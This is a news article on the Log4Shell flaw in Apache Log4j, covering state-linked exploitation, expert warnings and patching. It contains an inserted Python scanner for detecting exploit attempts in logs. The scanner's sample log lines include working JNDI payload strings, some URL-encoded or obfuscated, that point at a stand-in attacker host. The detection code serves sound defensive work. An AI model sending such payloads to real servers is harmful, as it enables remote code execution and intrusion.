Chinese hackers are already exploiting ‘fully weaponised’ Log4shell software vulnerability | Daily Mail Online

Chinese hackers are already exploiting a ‘fully weaponised’ software vulnerability which is causing mayhem on the web, with experts warning that it poses a threat to internet-connected devices across the globe. 

The vulnerability comes from Apache’s Log4j, a popular open source library that helps software developers track changes in applications that they build. 

Experts have said the ‘Log4shell’ flaw is the biggest threat in the history of modern computing, with countries issuing critical warnings over the vulnerability that allows criminals to steal personal data, plant malicious software or hijack card details.

Hundreds of millions of devices could be exposed to the vulnerability.

Any computer that’s connected to a server that uses an unpatched version of the software is open to attack from hackers, who could use it to access a company’s internal network, for example. 

‘The Apache Log4j Remote Code Execution Vulnerability is the single biggest, most critical vulnerability of the last decade,’ said Amit Yoran, chief executive of network security firm Tenable and founder of the US Computer Emergency Readiness Team. 

Juan Andres Guerrero-Saade, principal threat researcher with cybersecurity firm SentinelOne, called it ‘one of those nightmare vulnerabilities that there’s pretty much no way to prepare for.’

Guerrero-Saade said his firm had already seen Chinese hacking groups moving to take advantage of the vulnerability. 

US cybersecurity firms Mandiant and Crowdstrike also said they found sophisticated hacking groups leveraging the bug to breach targets. Mandiant described those hackers as ‘Chinese government actors’ in an email to Reuters news agency.

The flaw is considered so serious because the affected software is used in a wide range of devices that use Java software. It is so popular and embedded across many companies’ programs that security executives expect widespread abuse. 

Online services used by millions including Netflix, Amazon, Uber and LinkedIn, and cloud-based services such as Apple iCloud, Android OS, Google Documents and more, are all understood to be under threat from the software bug.

Tech giants such as Amazon Web Services and IBM have already moved to address the flaw in their products. However, potential attackers had more than a week’s head start before it was made public.

It was first noticed on sites used by users of the popular video game Minecraft, and was officially reported to Apache on November 24 by Chen Zhaojun – an employee of Chinese e-commerce giant Alibaba. 

The US government sent a warning to the private sector about Apache’s Log4j vulnerability and the looming risk it poses on Friday, while Germany has activated its national IT crisis centre in response to the ‘extremely critical’ flaw. 

‘The internet’s on fire right now,’ said Adam Meyers, senior vice president of intelligence at the cybersecurity firm Crowdstrike. ‘People are scrambling to patch,’ he said, ‘and all kinds of people scrambling to exploit it.’

He said Friday morning that in the 12 hours since the bug’s existence was disclosed, it had been ‘fully weaponized,’ meaning malefactors had developed and distributed tools to exploit it.

Everything we know about the ‘Log4Shell’ bug so far

WHAT IS THE PROGRAMMING FLAW? 

An exploit discovered in the Java logging library, log4j2, has sent developers scrambling for a patch.

Java remains one of the world’s most popular programming languages and is used to create functions within an app or system.

HOW WILL IT AFFECT MY DEVICES? 

With the ‘Log4Shell’ bug, hackers can take full control of an external server, without authentication, with relative ease.

Experts have warned it is one of the biggest threats in the history of modern computing.

The following apps or online services are known to use Java within their programming, either through back-end services or user interfaces.

WHAT CAN I DO TO STOP IT? 

News of a potential vulnerability affecting millions of devices has sent programmers scrambling for a fix.

Firewall and VPN providers are likely already working on short-term fixes to protect their customers’ online security.

Experts have suggested all Log4j users should immediately look to upgrade to Log4j-2.15.0-rc2.

Unofficial patches have also been launched by internet sleuths. 

Much of the software affected by Log4j, which bears names like Hadoop or Solr, may be unfamiliar to the public at large. 

But as with the SolarWinds program at the centre of a massive Russian espionage operation last year, the ubiquity of these workhorse programs makes them ideal jumping-off points for digital intruders. 

While a partial fix for the vulnerability was released on Friday by Apache, the maker of Log4j, affected companies and cyber defenders will need time to locate the vulnerable software and properly implement patches.

In practice, this flaw allows an outsider to enter active code into the record-keeping process. That code then tells the server hosting the software to execute a command giving the hacker control.
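The mechanism described above, an outsider's string ending up in a log message and being interpreted rather than merely recorded, is also what defenders look for in their own logs. The Python scanner below is an added example, not code from the article or from Apache: it undoes the decoding that Log4j itself performs (URL encoding and nested `${lower:}`/`${upper:}` lookups) before checking for the `${jndi:` lookup marker. The log lines and the hostname attacker.example are constructed for the example.

```python
import re
from urllib.parse import unquote

# Sample web-server access log, constructed for this example (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:14:03:45 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:04:02 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fb%7D HTTP/1.1" 200 512 "-" "curl/7.68"',
    '203.0.113.9 - - [10/Dec/2021:14:04:30 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/c}"',
    '203.0.113.12 - - [10/Dec/2021:14:05:00 +0000] "GET /docs/${version} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

# The lookup prefix that makes a vulnerable Log4j 2 fetch and run remote code.
JNDI_MARKER = "${jndi:"

# Log4j resolves inner lookups such as ${lower:J} before evaluating the outer
# ${jndi:...}, so a naive substring match on the raw line misses those lines.
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)


def _resolve_case(match: re.Match) -> str:
    text = match.group(2)
    return text.lower() if match.group(1).lower() == "lower" else text.upper()


def normalise(text: str, rounds: int = 5) -> str:
    """Undo URL encoding and lower/upper lookups until the text stops changing."""
    for _ in range(rounds):
        before = text
        text = CASE_LOOKUP.sub(_resolve_case, unquote(text))
        if text == before:
            break
    return text


def is_log4shell_probe(line: str) -> bool:
    """True when the line, after normalisation, carries a JNDI lookup."""
    return JNDI_MARKER in normalise(line).lower()


def scan(lines):
    """Return (1-based line number, normalised line) for every flagged line."""
    return [(n, normalise(line)) for n, line in enumerate(lines, 1) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for number, line in scan(SAMPLE_LOG):
        print(f"line {number}: {line}")
```

Lines 2, 3 and 4 of the sample are flagged; the `${version}` on line 5 is an ordinary lookup and is not.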

So far no major disruptive cyber incidents have been publicly documented as a result of the vulnerability, but researchers are seeing an alarming uptick in hacking groups trying to take advantage of the bug for espionage. 

What many experts now fear is that the bug could be used to deploy malware that either destroys data or encrypts it, like what was used against U.S. pipeline operator Colonial Pipeline Co in May which led to shortages of gas in some parts of the US.

Meanwhile, a spokesman for Germany’s Interior Ministry said the country’s federal IT safety agency is urging users to patch their systems as quickly as possible to fend off possible attacks using a bug in the Log4J tool.

‘The threat situation is extremely critical,’ the spokesman, Steve Alter, told reporters in Berlin. ‘Immediate protective measures are required.’

German authorities have recorded efforts to exploit the bug around the world, including successful attempts, he said, without elaborating. So far no successful attacks against German government entities or networks have been confirmed, though a number have been deemed vulnerable, said Alter.

Germany is in contact with ‘numerous national and international partners’ on the matter, he said. ‘A successful exploit of this weakness would mean that someone could take complete control of the affected system.’

Java remains one of the world’s most popular programming languages and is used to create functions within an app or system. It is still used to this day, from backend services to user-facing interfaces, in some of the world’s most popular applications and online services, including Netflix, Amazon, Google and Android OS, Spotify, LinkedIn and Uber.

‘I would be hard-pressed to think of a company that’s not at risk,’ said Joe Sullivan, chief security officer for Cloudflare, whose online infrastructure protects websites from malicious actors.

‘Log4Shell’ was uncovered in a utility that’s ubiquitous in cloud servers and enterprise software used across industry and government. 

Until it is resolved, criminals, spies and programming novices alike are granted easy access to internal networks where they can steal valuable data, plant malware, erase crucial information and much more.

Untold millions of servers have it installed, and experts said the fallout would not be known for several days. Amazon, Twitter and Apple’s iCloud are understood to be ‘vulnerable’ to the exploit.

Hackers are also understood to be able to use QR codes, whose use was widely popularised throughout the pandemic for NHS Test and Trace purposes, to run malicious code on servers. 

The scare prompted senior intelligence experts to react, including Robert Joyce, director of cybersecurity at the National Security Agency in America.

He explained: ‘The Log4j vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks, including the NSA’s GHIDRA (a free open source reverse engineering tool)’. 

The vulnerability, dubbed ‘Log4Shell’, was rated 10 on a scale of one to 10 by the Apache Software Foundation, which oversees development of the software. Anyone with the exploit can obtain full access to an unpatched computer that uses the software.

Experts said the extreme ease with which the vulnerability lets an attacker access a web server – no password required – is what makes it so dangerous.

Marcus Hutchins, an internet security researcher, warned Log4Shell could make millions of apps vulnerable to hacking as its software is often used by developers.  

Cybersecurity experts say users of the online game Minecraft have already exploited it to breach other users’ devices by pasting a short message into a chat box.

New Zealand’s computer emergency response team was among the first to report that the flaw was being ‘actively exploited in the wild’ just hours after it was publicly reported Thursday and a patch released.

The vulnerability, located in open-source Apache software used to run websites and other web services, was reported to the foundation on Nov. 24 by the Chinese tech giant Alibaba, it said. It took two weeks to develop and release a fix.

But patching systems around the world could be a complicated task. 

While most organizations and cloud providers such as Amazon should be able to update their web servers easily, the same Apache software is also often embedded in third-party programs, which often can only be updated by their owners.

The first obvious signs of the flaw’s exploitation appeared in Minecraft, an online game hugely popular with kids and owned by Microsoft. 

Meyers and security expert Marcus Hutchins said Minecraft users were already using it to execute programs on the computers of other users by pasting a short message in a chat box.

Microsoft said it had issued an urgent software patch for Minecraft users. ‘Customers who apply the fix are protected,’ it said.

Researchers reported finding evidence the vulnerability could be exploited in servers run by companies such as Apple, Amazon, Twitter and Cloudflare.
